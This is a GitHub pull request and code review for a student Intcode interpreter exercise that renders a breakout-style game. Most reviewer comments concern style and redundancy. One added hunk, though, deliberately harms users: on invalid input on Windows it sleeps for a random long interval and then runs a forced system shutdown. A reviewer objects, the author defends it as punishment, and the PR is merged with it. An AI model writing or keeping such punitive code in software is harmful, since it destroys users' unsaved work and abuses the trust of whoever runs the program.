### PR TITLE
finished exercise07

### PR DESCRIPTION
**Pull request by PixelWelt**
Highscore: 2853
image

### CODE REVIEW

**Review by LinusL2005 — COMMENTED** [review]
please change the label

**Comment by PixelWelt** [comment]
> please change the label

changed

File: Exercises/SoerenHerrmann/exercises_07.py [hunk 1]
```diff
@@ -0,0 +1,353 @@
...
+# EXAMPLE:
+# a sequence of output values like 1, 2, 3, 6, 5, 4 would
+#  - draw a paddle (type 3) at x=1, y=2
+#  - draw the ball (type 4) at x=6, y=5
+#
+#
+# PART 1:
+# run the game until it exits. Analyse the output produced during the run, and create
+# a visual representation (matplotlib or ascii-art are possibilities here...) of the screen display.
+# mark the different tile types as different colors or symbols. Upload the picture with your PR.
```
Comment (laraasphh) [inline Exercises/SoerenHerrmann/exercises_07.py:328]: Where is your picture?

Comment (PixelWelt) [reply Exercises/SoerenHerrmann/exercises_07.py:328]: uploaded

File: Exercises/SoerenHerrmann/exercises_07.py [hunk 2]
```diff
@@ -0,0 +1,353 @@
...
+    ADD = 1
+    MULTIPLY = 2
+    INPUT = 3
+    OUTPUT = 4
+    JUMP_IF_TRUE = 5
+    JUMP_IF_FALSE = 6
+    LESS_THAN = 7
+    EQUALS = 8
+    CHANGE_RELATIVE_OFFSET = 9
+    HALT = 99
```
Comment (laraasphh) [inline Exercises/SoerenHerrmann/exercises_07.py:68]: Nice using of enum, makes it more readable

File: Exercises/SoerenHerrmann/exercises_07.py [hunk 3]
```diff
@@ -0,0 +1,353 @@
...
+            idx, dct = write_value(dct, idx, param_mode, offset, input_value)
+            break
+        except ValueError:
+            print("Please enter a valid number")
+            # ! Punishes the user for wrong input
+            if platform == "win32":
+                time.sleep(random.randint(9999, 999999))
+                # ! additionaly punish windows users for using Windows and
+                # ! wrong input
+                subprocess.call("shutdown /s /t 1")
```
Comment (itsNerdyBirdy) [inline Exercises/SoerenHerrmann/exercises_07.py:202]: The command to shut down Windows on input error is extreme and unnecessary.

File: Exercises/SoerenHerrmann/exercises_07.py [hunk 4]
```diff
@@ -0,0 +1,353 @@
...
+    placeholder.append(output)
+    if len(placeholder) == 3:
+        x, y, tile = placeholder
+        draw_tile(triplet(x,y,tile))
+        placeholder.clear()
+    print(f"Output by opcode 4 = {output}")  # Required format
+    return idx + 1
+
+
+def change_offset(offset: int, instruction: list, dct: dict, idx: int) -> int:
```
Comment (itsNerdyBirdy) [inline Exercises/SoerenHerrmann/exercises_07.py:220]: Some of your functions have docstrings, but this one does not. Please keep your code consistent.

File: Exercises/SoerenHerrmann/exercises_07.py [hunk 5]
```diff
@@ -0,0 +1,353 @@
...
+    param_mode = op_mode(int(instruction[0]))
+    idx += 1
+    param_one: int = get_element(param_mode, dct, idx, offset)
+    offset += param_one
+    idx += 1
+    return offset, idx
+
+
+def check_for_opcode(idx: int, dct: dict, offset: int = 0):
```
Comment (itsNerdyBirdy) [inline Exercises/SoerenHerrmann/exercises_07.py:229]: Some of your functions have docstrings, but this one does not. Please keep your code consistent.

File: Exercises/SoerenHerrmann/exercises_07.py [hunk 6]
```diff
@@ -0,0 +1,353 @@
...
+    """reads the commands and executes and also decides how
+    to handle the input since it accepts dict, str and list"""
+    if type(commands) is str:
+        commands = read_file(commands)
+    elif type(commands) is list:
+        commands = list_to_dict(commands)
+    offset = 0
+    while end is False:
+        idx, end, offset = check_for_opcode(idx, commands, offset)
+    return commands[0]
```
Comment (itsNerdyBirdy) [inline Exercises/SoerenHerrmann/exercises_07.py:281]: Good idea to make the input more flexible.

File: Exercises/SoerenHerrmann/exercises_07.py [hunk 7]
```diff
@@ -0,0 +1,353 @@
...
+
+def calc(dct: dict, idx: int, op: operations, instruction: list, offset: int) -> int:
+    """calc is short for calculator. Handles 1,2,7 and 8"""
+    param_one_mode = op_mode(int(instruction[0]))
+    param_two_mode = op_mode(int(instruction[1]))
+    idx += 1 
+    param_one = get_element(param_one_mode, dct, idx, offset)
+    idx += 1
+    param_two = get_element(param_two_mode, dct, idx, offset)
+    idx += 1
```
Comment (itsNerdyBirdy) [inline Exercises/SoerenHerrmann/exercises_07.py:140]: idx += 1
This is redundant; please adjust it. My suggestion would be:
```suggestion
    param_one = get_element(param_one_mode, dct, idx + 1, offset)
    param_two = get_element(param_two_mode, dct, idx + 2, offset)
    idx += 3
```

File: Exercises/SoerenHerrmann/exercises_07.py [hunk 8]
```diff
@@ -0,0 +1,353 @@
...
+    param_two_mode = op_mode(int(instruction[1]))
+
+    idx += 1
+    param_one = get_element(param_one_mode, dct, idx, offset)
+    idx += 1
+    param_two = get_element(param_two_mode, dct, idx, offset)
+
+    if (op == operations.JUMP_IF_TRUE and param_one != 0) or (op == operations.JUMP_IF_FALSE and param_one == 0):
+        return param_two
+    return idx + 1
```
Comment (itsNerdyBirdy) [inline Exercises/SoerenHerrmann/exercises_07.py:172]: idx += 1
This is redundant; please adjust it. My suggestion would be:
```suggestion
    param_one = get_element(param_one_mode, dct, idx + 1, offset)
    param_two = get_element(param_two_mode, dct, idx + 2, offset)

    if (op == operations.JUMP_IF_TRUE and param_one != 0) or (op == operations.JUMP_IF_FALSE and param_one == 0):
        return param_two
    return idx + 3
```

**Review by itsNerdyBirdy — CHANGES_REQUESTED** [review]
The code is fundamentally solid and modular, but it suffers from unnecessary complexity. 
Please modify the following lines: Lines (136-140), Lines (165-172), and Lines (198-202).

File: Exercises/SoerenHerrmann/exercises_07.py (hunk 3 above)
Comment (PixelWelt) [reply Exercises/SoerenHerrmann/exercises_07.py:202]: ID10T Errors need to be punished

**Pull request merged**